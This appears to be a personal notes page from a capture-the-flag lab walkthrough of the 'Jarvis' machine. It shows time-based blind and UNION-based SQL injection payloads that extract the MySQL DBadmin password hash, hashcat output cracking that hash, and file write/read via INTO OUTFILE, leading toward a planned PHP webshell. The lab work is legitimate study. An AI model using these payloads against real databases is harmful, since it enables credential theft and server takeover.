InfoSec LAB

Jarvis_SQLi

Created: 4 min read

SQLi

2 types of SQLi were confirmed from the enumeration earlier. both the in-band and Out-of-Band. More specifically Union-based and Time-based

In this page, I will attempt to perform a data extraction and potentially file read/write and RCE as well (if the configured permission allows)

Blind

(SELECT SLEEP(3) FROM information_schema.schemata WHERE schema_name LIKE 'h%')#

The current database starts with the character, “h”, likely hotel considering the name of the website

(SELECT SLEEP(3) FROM information_schema.schemata WHERE schema_name='hotel')#

Yep. It turns out to be just hotel

(SELECT SLEEP(3) FROM information_schema.schemata WHERE schema_name='mysql')#

There also is the default database, mysql, as expected

(SELECT SLEEP(3) FROM information_schema.tables WHERE table_schema='hotel' AND table_name LIKE 'r%')#

There is a table starting with a character, “r”, within the current DB, hotel It’s likely room

(SELECT SLEEP(3) FROM information_schema.tables WHERE table_schema='hotel' AND table_name='room')#

The table is room I don’t think this table would contain any credential I will try to get credential from the mysql db

(SELECT SLEEP(3) FROM information_schema.columns WHERE table_schema='mysql' AND table_name='user' AND column_name='user')#

The mysql.user table has a column , user

(SELECT SLEEP(3) FROM information_schema.columns WHERE table_schema='mysql' AND table_name='user' AND column_name='user')#

The mysql.user table also has the column, password

(SELECT SLEEP(3) FROM mysql.user WHERE user LIKE 'D%')#

Interestingly, the default user, root is not there Instead, there is a username starting with a character “D” Notice the capitalized character

(SELECT SLEEP(3) FROM mysql.user WHERE user LIKE 'DB%')#

It’s the followed by a character, “B”, forming a word “DB”

(SELECT SLEEP(3) FROM mysql.user WHERE user LIKE 'DBa%')#

It’s again followed by a character, “a” Is it admin?

(SELECT SLEEP(3) FROM mysql.user WHERE user LIKE 'DBadmin%')#

It may be DBadmin The SQL query is still using the LIKE operator so I need to confirm it with =

(SELECT SLEEP(3) FROM mysql.user WHERE user='DBadmin')#

DBadmin is confirmed to be a valid user

(SELECT SLEEP(3) FROM mysql.user WHERE user='DBadmin' AND password like '*%')#

Password hash starts with an asterisk character, ”*”

(SELECT SLEEP(3) FROM mysql.user WHERE user='DBadmin' AND password like '*2D2B7A5E4E637B8FBA1D17%')#

Manual enumeration of SQL password hash is just an insane mount of work I got *2D2B7A5E4E637B8FBA1D17 by far

(SELECT SLEEP(3) FROM mysql.user WHERE user='DBadmin' AND password='*2D2B7A5E4E637B8FBA1D17F40318F277D29964D0')#

Password hash extracted for the DBadmin user; *2D2B7A5E4E637B8FBA1D17F40318F277D29964D0

Password Cracking

┌──(kali㉿kali)-[~/archive/htb/labs/jarvis]
└─$ hashcat -a 0 -m 300 DBadmin.hash /usr/share/wordlists/rockyou.txt   
hashcat (v6.2.6) starting
 
hashes: 1 digests; 1 unique digests, 1 unique salts
bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
rules: 1
 
dictionary cache hit:
* filename..: /usr/share/wordlists/rockyou.txt
* passwords.: 14344385
* bytes.....: 139921507
* keyspace..: 14344385
 
2d2b7a5e4e637b8fba1d17f40318f277d29964d0:imissyou         
 
session..........: hashcat
status...........: Cracked
hash.mode........: 300 (MySQL4.1/MySQL5)
hash.target......: 2d2b7a5e4e637b8fba1d17f40318f277d29964d0
time.started.....: Mon Jan 30 17:07:56 2023 (0 secs)
time.estimated...: Mon Jan 30 17:07:56 2023 (0 secs)
kernel.feature...: Pure Kernel
guess.base.......: File (/usr/share/wordlists/rockyou.txt)
guess.queue......: 1/1 (100.00%)
speed.#1.........:   602.2 kH/s (0.23ms) @ Accel:256 Loops:1 Thr:1 Vec:8
recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
progress.........: 1536/14344385 (0.01%)
rejected.........: 0/1536 (0.00%)
restore.point....: 768/14344385 (0.01%)
restore.sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
candidate.engine.: Device Generator
candidates.#1....: football1 -> mexico1
hardware.mon.#1..: Util: 45%
 
started: Mon Jan 30 17:07:55 2023
stopped: Mon Jan 30 17:07:58 2023

Hashcat cracked the password hash; imissyou
dbadmin:imissyou

Union

-1 UNION SELECT 1,2,3,4,5,6,7 #

It was discovered that the SQL query pulls data from 7 columns

This is how the query is displayed.

-1 UNION SELECT 1,version(),3,user(),database(),6,7 #

The backend DB is hotel using 10.1.37-MariaDB-0+deb9u1 by the DBadmin user

-1 UNION SELECT 1,user,3,password,host,6,7 FROM mysql.user #

Only a single credential returned from the mysql.user table The password hash for the DBadmin user is *2D2B7A5E4E637B8FBA1D17F40318F277D29964D0

Password Cracking

i can get the hash cracked through an online tool as well dbadmin:imissyou

file write/read

I can write to a files via SQLi through the INTO OUTFILE function in MySQL However, this can only be done if I have a sufficient amount of privileges. ex. root user I will test it out by writing something to the file at /tmp/test.txt

-1 UNION SELECT 1,2,3,4,'This is a testing',6,7 INTO OUTFILE '/tmp/test.txt' #

Done. Now I can check it

Reading files can be done via SQLi through the loadfile() function in MySQL I will try to read the file that I just created at /tmp/test.txt

Confirmed! This means that I can write a simple PHP webshell to a file at the web root for easy of access

I remember seeing an instance of PHPMyAdmin. I will continue there

Interactive Graph View

Backlinks